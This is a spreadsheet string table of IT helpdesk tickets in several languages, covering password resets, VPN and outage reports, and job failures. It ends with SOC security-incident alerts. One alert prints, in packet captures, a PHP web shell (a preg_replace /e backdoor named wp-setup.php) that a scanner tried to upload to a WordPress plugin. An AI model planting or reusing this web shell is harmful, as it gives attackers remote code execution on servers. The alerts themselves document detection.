    <t xml:space="preserve">we jsut had a new company marocm apac cost cneter cplant_2412. pls help to change the internal order number 717625 from cost center cnn010 to  cplant_2412.  </t>
  </si>
  <si>
    <t xml:space="preserve">not able to find a folder in outlook </t>
  </si>
  <si>
    <t>unable to send mail with forward restriction</t>
  </si>
  <si>
    <t>xjzcbgnp vfkwscao</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wqfzjycu.omleknjd@gmail.com
hi deeghyupak,
i was on vacation when your e-mail was sent last week and only managed to see it on my return minutes before the automatically deployment.
on a general note unless there is a critical security risk deployment these updates should be limited to once a month, so far this month this is the third deployment. you may not realize the impact this has on our users especially the unannounced updates. in addition with users similarly to csr who are working directly with our customers, i do not think it is the best practice to deploy automatically updates especially to all users all at the same time.
the impact of yesterday's deployment was that our csr phones were not operating for over 2 hours during the morning.
</t>
  </si>
  <si>
    <t>problem mit festnetztelefon</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jctnelqs.lansuiwe@gmail.com
verehrte damen und herren,
an meinem festnetztelefon ist seit geraumer zeit die anzeige im display nur noch unvollstÃ¤ndig erkennbar.
mehrere waagerechte linien machen die anzeige unlesbar.
meine telefonnummer lautet 09279/80-155.
bitte um abhilfe.
mit freundlichem gruÃŸ
jctnelqs lansuiwe
quality assurance
jctnelqs.lansuiwe@gmail.com&lt;mailto:jctnelqs.lansuiwe@gmail.com&gt;
</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1148 at 08/17/16 01:15:32</t>
  </si>
  <si>
    <t xml:space="preserve">please advise damage dell laptop lit only 1 minute </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bmhxwvys.tdmgolwn@gmail.com
dear sir
please advise damage dell laptop lit only 1 minute in, see attachment
thank for the response and cooperation.
best </t>
  </si>
  <si>
    <t>demage laptop</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bmhxwvys.tdmgolwn@gmail.com
dear sir
i apologize
i do not know a lot about the mechanics lap top, the power button surely die.
sorry i just users, in indonesia, my time is very limited for customer visits and evaluation of the data and provide engineering solutions.
so if possible  i ask laptop in exchange, please help if you can bring to mr. abhay,
mr. abhay have a plan date august 22, 2016 will come to indonesia.
</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 account locked </t>
  </si>
  <si>
    <t>need adobe reader to download .</t>
  </si>
  <si>
    <t>account activation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nxlzpgfr.rlqowmyt@gmail.com
good morning,
please reactivate the account of my colleague mr. xrfcjkdl dtnzgkby (vvsfgtyrinv),
best </t>
  </si>
  <si>
    <t>virus has been found in my laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gqwdslpc.clhgpqnb@gmail.com_x000D_
_x000D_
following virus has been found in my laptop, please rectify the same._x000D_
_x000D_
_x000D_
[cid:image003.jpg@01d1f865.b82a99c0]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>skypeä¼šè®®æ—¶ä¸åŽ»</t>
  </si>
  <si>
    <t>skypeä¼šè®®ä»Žé‚®ç®±é‡Œçš„é“¾æŽ¥è¿›ä¸åŽ»ã€‚</t>
  </si>
  <si>
    <t xml:space="preserve">attendance_tool password </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xwertljy.zrmlhkyq@gmail.com_x000D_
_x000D_
hello,_x000D_
attendance_tool password forgot please reset._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">reboot of lhqsm435, HostName_951, HostName_952, lhqsm489 &amp; HostName_997 (sql uacyltoe hxgaycze). </t>
  </si>
  <si>
    <t>po issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jrdafplx.fcnjmvts@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
for the multiple cost center , why the gr amount is 0?_x000D_
_x000D_
[cid:image005.png@01d1f873.8d4d35b0]_x000D_
_x000D_
[cid:image006.png@01d1f873.8d4d35b0]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t>i can not connect to vpn.</t>
  </si>
  <si>
    <t>name:pfzxecbo ptygkvzl_x000D_
language:_x000D_
browser:microsoft internet explorer_x000D_
email:pfzxecbo.ptygkvzl@gmail.com_x000D_
customer number:_x000D_
telephone:_x000D_
summary:i can not connect to vpn.</t>
  </si>
  <si>
    <t>å®žä¹ ç”Ÿç™»å½•office365ä¸‹è½½é‚®ä»¶é™„ä»¶æ—¶æŠ¥é”™ï¼ˆè½¬ç»™è´ºæ­£å¹³ï¼‰</t>
  </si>
  <si>
    <t>å®žä¹ ç”Ÿç™»å½•office365ä¸‹è½½é‚®ä»¶é™„ä»¶æ—¶æŠ¥é”™</t>
  </si>
  <si>
    <t>kyagjxdh dmtjpbnz</t>
  </si>
  <si>
    <t>lcow8327368 shows down since 8/16/2016 3:48 pm  est</t>
  </si>
  <si>
    <t>lcow8327368 shows down since 8/16/2016 3:48 pm  est_x000D_
location : new albaney._x000D_
engineering_tool aggergrythator production server.</t>
  </si>
  <si>
    <t>é¤åŽ…ç”µè§†æ— æ³•æ’­æ”¾è§†é¢‘æ–‡ä»¶</t>
  </si>
  <si>
    <t>é¤åŽ…ç”µè§†æœºæ— æ³•æ’­æ”¾è§†é¢‘æ–‡ä»¶ï¼Œè¯·å°è´ºååŠ©å®Œæˆã€‚è°¢è°¢ï¼</t>
  </si>
  <si>
    <t>aeozwlch lkiocfbn</t>
  </si>
  <si>
    <t>please help add e-mail box to my outlook</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pkdavqwt.tafrmxsh@gmail.com
hello it team,
could you please add e-mail box -kds.plant_283-services@company.com&lt;mailto:-kds.plant_283-services@company.com&gt; to my outlook? my id is jilgtyq, </t>
  </si>
  <si>
    <t>network outage : , spain kenci site is hard down at 8:40 pm et on 08/16. no backup circuit.</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________8:40 pm et on 08/16._____________x000D_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__no______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ____no___     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">login issue </t>
  </si>
  <si>
    <t>toqcmkfw inwporqy</t>
  </si>
  <si>
    <t>company login issue.</t>
  </si>
  <si>
    <t>wyjsbzda yfeuhtib</t>
  </si>
  <si>
    <t>åˆ¶ç²‰ç”µè„‘ç”µæºçº¿ç­‰æŸå</t>
  </si>
  <si>
    <t>åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤å†…ç”µè„‘ç”µæºçº¿ã€ç½‘çº¿ç­‰å› é«˜æ¸©æŸåï¼Œéœ€æ›´æ¢ã€‚</t>
  </si>
  <si>
    <t>skype for businessæ•…éšœ</t>
  </si>
  <si>
    <t>ç³»ç»Ÿä¸­çªç„¶æ‰¾ä¸åˆ°skype for businessäº†</t>
  </si>
  <si>
    <t>uheflzgy cpaosbfz</t>
  </si>
  <si>
    <t>æ‹¼å†™å’Œè¯­æ³•é”™è¯¯</t>
  </si>
  <si>
    <t>ç¼–è¾‘pptæ—¶ï¼Œæ€»æ˜¯å¼¹å‡º"æ— æ³•æ£€æŸ¥æ‹¼å†™å’Œè¯­æ³•é”™è¯¯"ï¼Œä¹Ÿæ— æ³•å®‰è£…ã€‚</t>
  </si>
  <si>
    <t>ç”µè„‘æ•…éšœ</t>
  </si>
  <si>
    <t>è´¨æŽ§éƒ¨æ‹‰åŠ›è¯•éªŒæœºæŽ§åˆ¶ç”µè„‘çš„æ“ä½œç³»ç»Ÿå¯åŠ¨éžå¸¸ç¼“æ…¢ï¼ŒæŽ§åˆ¶è½¯ä»¶ä¸¢å¤±ã€‚</t>
  </si>
  <si>
    <t>kwpzbxvf cvuhoizx</t>
  </si>
  <si>
    <t>HostName_188: ora-00600: internal error code, arguments: [kggsmgetstring:1], [0x1233a6d28], [11], [1], [10], [], [], [], []</t>
  </si>
  <si>
    <t>HostName_188 :  ora-00600: internal error code, arguments: [kggsmgetstring:1], [0x1233a6d28], [11], [1], [10], [], [], [], []</t>
  </si>
  <si>
    <t xml:space="preserve">unable to submit discount form </t>
  </si>
  <si>
    <t>skyrlznp rzgbmnyt</t>
  </si>
  <si>
    <t>reset erp SID_34 password for user soemec</t>
  </si>
  <si>
    <t>abended job in job_scheduler: hr_tooldcvcgenratn</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: hr_tooldcvcgenratn at 08/16/16 17:02:27</t>
  </si>
  <si>
    <t>user got a pop-up that displayed virus on the browser.</t>
  </si>
  <si>
    <t>user got a pop-up that displayed virus on the browser._x000D_
-advised the user to restart the pc as he was unable to open anyother window._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>please extend wireless access from ticket_no1480742 to 12/31/16</t>
  </si>
  <si>
    <t xml:space="preserve">consultant vmhfteqo jpsfikow from schneider downs needs wireless account extended to the end of the year._x000D_
_x000D_
it is due to expire on 8/31/16, per ticket_no1480742._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>lcosm005(conformaclad shop_floor_app server):sqlagent.exe and sqlservr.exe are showing down since 4:02 pm on 8/16 et</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to her microsoft 365 email account </t>
  </si>
  <si>
    <t>scourghi luhsqbmy</t>
  </si>
  <si>
    <t>power outage : usa - (company inc)  vpn circuit is down at 3:45 pm et on 08/16. site is up on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____slo site____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____________3:45 pm et on 08/16.__________x000D_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___na________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</si>
  <si>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vitalyst // unable to access to forecast to plan in crm</t>
  </si>
  <si>
    <t>unable to access to forecast to plan in crm</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1320</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1320 at 08/16/16 15:06:28</t>
  </si>
  <si>
    <t>security incidents - ( #in33505432 ) : repeat outbound connection for 135/tcp from 10.16.140.231</t>
  </si>
  <si>
    <t>source ip :10.16.140.231
system name :evhl8114123
user  name: companypzyre mqlsfkre(ldnfgt)
location :germany
sep , sms status :no updated
field sales user ( yes / no) :  no
dsw event log:see below
--------------------------------------------------------------------------
=========================
incident overview
=========================
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
1) full escalation for windows login failure alerts (explicit notification via a high priority ticket and a phone call)
2) automatically resolve windows login failure alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)
sincerely,
secureworks soc
=========================
technical details
=========================
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
-w32.blaster.worm/msblast/lovsan 
-w32.welchia/nachi
-w32.reatle
=========================
references
=========================
=========================
event data
=========================
related events: 
event id: 81646471
event summary: repeat outbound connection for 135/tcp
occurrence count: 234
event count: 2
host and connection information
source ip: 10.16.140.231
source hostname: evhl8114123 
source port: 54411
destination ip: 62.157.140.133
destination port: 135
destination ip geolocation: ulm, deu
connection directionality: outgoing
protocol: tcp
device information
device ip: 80.71.06.702
device name: company-european-asa.company.com-1
log time: 2016-08-15 at 09:26:41 utc
action: blocked
cvss score: -1 
scwx event processing information
sherlock rule id (sle): 237526
inspector rule id: 186739
inspector event id: 626672260
ontology id: 200020003203009162
event type id: 200020003203009062
agent id: 103761
event detail:
aug 15 09:26:41 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54411 dst noris:62.157.140.133/135 by access-group "acl_inside" [0xed29b7f9, 0x0]
event id: 81646714
event summary: repeat outbound connection for 135/tcp
occurrence count: 234
event count: 2
host and connection information
source ip: 10.16.140.231
source hostname: evhl8114123 
source port: 54411
destination ip: 80.156.86.78
destination port: 135
destination ip geolocation: ulm, deu
connection directionality: outgoing
protocol: tcp
device information
device ip: 80.71.06.702
device name: company-european-asa.company.com-1
log time: 2016-08-15 at 09:26:41 utc
action: blocked
cvss score: -1 
scwx event processing information
sherlock rule id (sle): 237526
inspector rule id: 186739
inspector event id: 626672260
ontology id: 200020003203009162
event type id: 200020003203009062
agent id: 103761
event detail:
aug 15 09:27:49 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54481 dst noris:80.156.86.78/135 by access-group "acl_inside" [0xed29b7f9, 0x0]</t>
  </si>
  <si>
    <t>name:mikhghytr karaffa
language:
browser:microsoft internet explorer
email:vfrdxtqw.jfbmsenz@gmail.com
customer number:
telephone:
summary:hello, can you please advise on my crm password to start?</t>
  </si>
  <si>
    <t>update on crm access ticket_no0430983</t>
  </si>
  <si>
    <t>ticket update on ticket_no0430539</t>
  </si>
  <si>
    <t>ticket update on inplant_850619</t>
  </si>
  <si>
    <t>ticket update on inplant_850899</t>
  </si>
  <si>
    <t>ticket update on inplant_850503</t>
  </si>
  <si>
    <t>source ip :10.16.140.231_x000D_
system name :evhl8114123_x000D_
user  name: companypzyre mqlsfkre(ldnfgt)_x000D_
location :germany_x000D_
sep , sms status :no updated_x000D_
field sales user ( yes / no) :  no_x000D_
dsw event log:see below_x000D_
--------------------------------------------------------------------------_x000D_
=========================_x000D_
incident overview_x000D_
=========================_x000D_
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secureworks soc_x000D_
_x000D_
=========================_x000D_
technical details_x000D_
=========================_x000D_
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_x000D_
_x000D_
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include:_x000D_
-w32.blaster.worm/msblast/lovsan _x000D_
-w32.welchia/nachi_x000D_
-w32.reatle_x000D_
_x000D_
_x000D_
=========================_x000D_
references_x000D_
=========================_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 81646471_x000D_
event summary: repeat outbound connection for 135/tcp_x000D_
occurrence count: 234_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 10.16.140.231_x000D_
source hostname: evhl8114123 _x000D_
source port: 54411_x000D_
destination ip: 62.157.140.133_x000D_
destination port: 135_x000D_
destination ip geolocation: ulm, deu_x000D_
connection directionality: outgoing_x000D_
protocol: tcp_x000D_
_x000D_
device information_x000D_
device ip: 80.71.06.702_x000D_
device name: company-european-asa.company.com-1_x000D_
log time: 2016-08-15 at 09:26:41 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 237526_x000D_
inspector rule id: 186739_x000D_
inspector event id: 626672260_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103761_x000D_
_x000D_
event detail:_x000D_
aug 15 09:26:41 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54411 dst noris:62.157.140.133/135 by access-group "acl_inside" [0xed29b7f9, 0x0]_x000D_
_x000D_
_x000D_
_x000D_
event id: 81646714_x000D_
event summary: repeat outbound connection for 135/tcp_x000D_
occurrence count: 234_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 10.16.140.231_x000D_
source hostname: evhl8114123 _x000D_
source port: 54411_x000D_
destination ip: 80.156.86.78_x000D_
destination port: 135_x000D_
destination ip geolocation: ulm, deu_x000D_
connection directionality: outgoing_x000D_
protocol: tcp_x000D_
_x000D_
device information_x000D_
device ip: 80.71.06.702_x000D_
device name: company-european-asa.company.com-1_x000D_
log time: 2016-08-15 at 09:26:41 utc_x000D_
action: blocked_x000D_
cvss score: -1 _x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 237526_x000D_
inspector rule id: 186739_x000D_
inspector event id: 626672260_x000D_
ontology id: 200020003203009162_x000D_
event type id: 200020003203009062_x000D_
agent id: 103761_x000D_
_x000D_
event detail:_x000D_
aug 15 09:27:49 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54481 dst noris:80.156.86.78/135 by access-group "acl_inside" [0xed29b7f9, 0x0]</t>
  </si>
  <si>
    <t>circuit outage: carrier, india telecom_vendor_1 circuit is down since 3:55 am et on 08/16 site is up on primary tikona circuit</t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______3:55 am et on 08/16_______________x000D_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___na________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</si>
  <si>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unable to access site </t>
  </si>
  <si>
    <t>could you please help set up erp.  my user name and password do not work</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: saqbgcpl.ybfzcjiq@gmail.com_x000D_
_x000D_
hello,_x000D_
could you please help set up erp.  my user name and password do not work._x000D_
</t>
  </si>
  <si>
    <t>zmmdata currency error when trying to extend to plant_317.  assign to vaghjmskee krisyuhnyrt</t>
  </si>
  <si>
    <t xml:space="preserve">zmmdata currency error when trying to extend to plant_317.  assign to vaghjmskee krisyuhnyrt
i am getting the following error when trying to extend to plant_317.  example mm#2240970
currency amount 3.4500 jpy in field moving_pr could not be converted
</t>
  </si>
  <si>
    <t>unable to connect to dv06</t>
  </si>
  <si>
    <t>security incidents - ( sw #in33501789 ) : broadscanning: possible vulnerability scanning - 46.161.9.35</t>
  </si>
  <si>
    <t>we are seeing activity indicating the host at 46.161.9.35 is conducting a vulnerability scan. these scans are used to identify specific vulnerabilities on a remote host that could be exploited to potentially interfere with service availability, execute code, or usa an attacker with unauthorized access. the results of this scan could be used for future attacks or exploitation of the targeted host(s). _x000D_
_x000D_
based on our internet visibility we are detecting this as a non-targeted broadscan. similar activity from this source has been detected across our client base. please consider blocking this ip address and investigating the host for any malicious scrip_x000D_
_x000D_
we are escalating this incident to you via a medium priority ticket as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._x000D_
_x000D_
1)full escalation for broadscanning alerts (explicit notification via a high priority ticket and phone call)_x000D_
2)autoresolve for broadscanning alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000D_
_x000D_
sincerely,_x000D_
secureworks soc_x000D_
_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 43589636_x000D_
event summary: 20369 vid12631 suspicious executable file upload php http incoming_x000D_
occurrence count: 2_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 46.161.9.35_x000D_
source port: 52806_x000D_
source ip geolocation: st pethrywrsburg, rus_x000D_
destination ip: 172.20.10.37_x000D_
destination port: 80_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http method: post_x000D_
http status code: 404_x000D_
user agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0_x000D_
host: www.companyipg.com_x000D_
full url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php_x000D_
_x000D_
device information_x000D_
device ip: 172.20.10.208_x000D_
device name: isensor02.company.com_x000D_
log time: 2016-08-14 at 20:38:30 utc_x000D_
action: not blocked_x000D_
vendor eventid: 655375_x000D_
cvss score: -1 _x000D_
vendor priority: 3_x000D_
vendor version: 7_x000D_
vendor reference: vid, 12631_x000D_
file name: wp-setup.php_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 891631_x000D_
inspector rule id: 277082_x000D_
inspector event id: 61024435_x000D_
ontology id: 200020003203722280_x000D_
event type id: 200020003203056732_x000D_
agent id: 103793_x000D_
_x000D_
event detail:_x000D_
[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]_x000D_
[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602984][event id: 655375][time: 2582318221.714106]_x000D_
[xref =&gt; vid, 12631]_x000D_
[src ip: 46.161.9.35][dst ip: 172.20.10.37][sport/itype: 52806][dport/icode: 80][proto: 6]_x000D_
08/14/2016-20:38:30.714106 46.161.9.35:52806 -&gt; 172.20.10.37:80_x000D_
tcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df_x000D_
***ap*** seq: 0x49c51796 ack: 0x9698e7c8 win: 0x73 tcplen: 32_x000D_
tcp options (3) =&gt; nop nop ts: 380683315 9237098 _x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]_x000D_
_x000D_
[ex http_hostname 10: www.companyipg.com]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
.......wz...........eh...\@.1.gm...#...%.f.pi..........sk2...........|..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file";.filename="wp-setup.php"..content-type:.text/plain....&lt;?php.if.(!isset($_request['e51e'])).header("http/1.0.404.not.found");.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?&gt;..--ba7336a47f1648dc9255eb59510e6f02--.._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 c6d6 b057 7ae5 0a00 ca02 0000 .......wz......._x000D_
000010 ca02 0000 4568 02ca 115c 4000 3106 476d ....eh...\@.1.gm_x000D_
000020 2ea1 0923 ac14 0a25 ce46 0050 49c5 1796 ...#...%.f.pi..._x000D_
000030 9698 e7c8 8018 0073 6b32 0000 0101 080a .......sk2......_x000D_
000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp_x000D_
000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins_x000D_
000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye_x000D_
000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti_x000D_
000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader_x000D_
000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h_x000D_
0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme_x000D_
0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont_x000D_
0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297._x000D_
0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding_x000D_
0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate._x000D_
0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us_x000D_
000100 6572 2SID_29 6765 6e74 3a20 4d6f 7a69 6c6c er-agent:.mozill_x000D_
000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n_x000D_
000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0)._x000D_
000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f_x000D_
000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con_x000D_
000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al_x000D_
000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ_x000D_
000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for_x000D_
000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary_x000D_
000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d_x000D_
0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0_x000D_
0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47_x000D_
0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595_x000D_
0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content_x000D_
0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo_x000D_
0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name="f_x000D_
000200 696c 6522 3b20 6669 6c65 6e61 6d65 3d22 ile";.filename="_x000D_
000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php"..c_x000D_
000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex_x000D_
000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....&lt;?php_x000D_
000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re_x000D_
000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e']))._x000D_
000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header("http/1.0_x000D_
000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found")_x000D_
000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(_x000D_
000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re_x000D_
0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'_x000D_
0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?&gt;..--ba7336_x000D_
0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb_x000D_
0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--.._x000D_
==pcap 1 hex e==_x000D_
_x000D_
event id: 43589634_x000D_
event summary: 20369 vid12631 suspicious executable file upload php http incoming_x000D_
occurrence count: 2_x000D_
event count: 2_x000D_
_x000D_
host and connection information_x000D_
source ip: 46.161.9.35_x000D_
source port: 52806_x000D_
source ip geolocation: st pethrywrsburg, rus_x000D_
destination ip: 208.211.136.158_x000D_
destination port: 80_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http method: post_x000D_
http status code: 404_x000D_
user agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0_x000D_
host: www.companyipg.com_x000D_
full url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php_x000D_
_x000D_
device information_x000D_
device ip: 208.211.136.207_x000D_
device name: isensplant_247.company.com_x000D_
log time: 2016-08-14 at 20:38:30 utc_x000D_
action: not blocked_x000D_
vendor eventid: 655375_x000D_
cvss score: -1 _x000D_
vendor priority: 3_x000D_
vendor version: 7_x000D_
vendor reference: vid, 12631_x000D_
file name: wp-setup.php_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 891631_x000D_
inspector rule id: 277082_x000D_
inspector event id: 61024435_x000D_
ontology id: 200020003203722280_x000D_
event type id: 200020003203056732_x000D_
agent id: 102989_x000D_
_x000D_
event detail:_x000D_
[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]_x000D_
[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602981][event id: 262411][time: 2582318221.758719]_x000D_
[xref =&gt; vid, 12631]_x000D_
[src ip: 46.161.9.35][dst ip: 208.211.136.158][sport/itype: 52806][dport/icode: 80][proto: 6]_x000D_
08/14/2016-20:38:30.758719 46.161.9.35:52806 -&gt; 208.211.136.158:80_x000D_
tcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df_x000D_
***ap*** seq: 0x3043ff92 ack: 0xdef989b5 win: 0x73 tcplen: 32_x000D_
tcp options (3) =&gt; nop nop ts: 380683315 9237098 _x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]_x000D_
_x000D_
[ex http_hostname 10: www.companyipg.com]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
.......w............eh...\@.1..4...#.....f.p0c.........s.1...........|..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file";.filename="wp-setup.php"..content-type:.text/plain....&lt;?php.if.(!isset($_request['e51e'])).header("http/1.0.404.not.found");.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?&gt;..--ba7336a47f1648dc9255eb59510e6f02--.._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 c6d6 b057 bf93 0b00 ca02 0000 .......w........_x000D_
000010 ca02 0000 4568 02ca 115c 4000 3106 a434 ....eh...\@.1..4_x000D_
000020 2ea1 0923 d0d3 889e ce46 0050 3043 ff92 ...#.....f.p0c.._x000D_
000030 def9 89b5 8018 0073 0f31 0000 0101 080a .......s.1......_x000D_
000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp_x000D_
000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins_x000D_
000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye_x000D_
000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti_x000D_
000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader_x000D_
000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h_x000D_
0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme_x000D_
0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont_x000D_
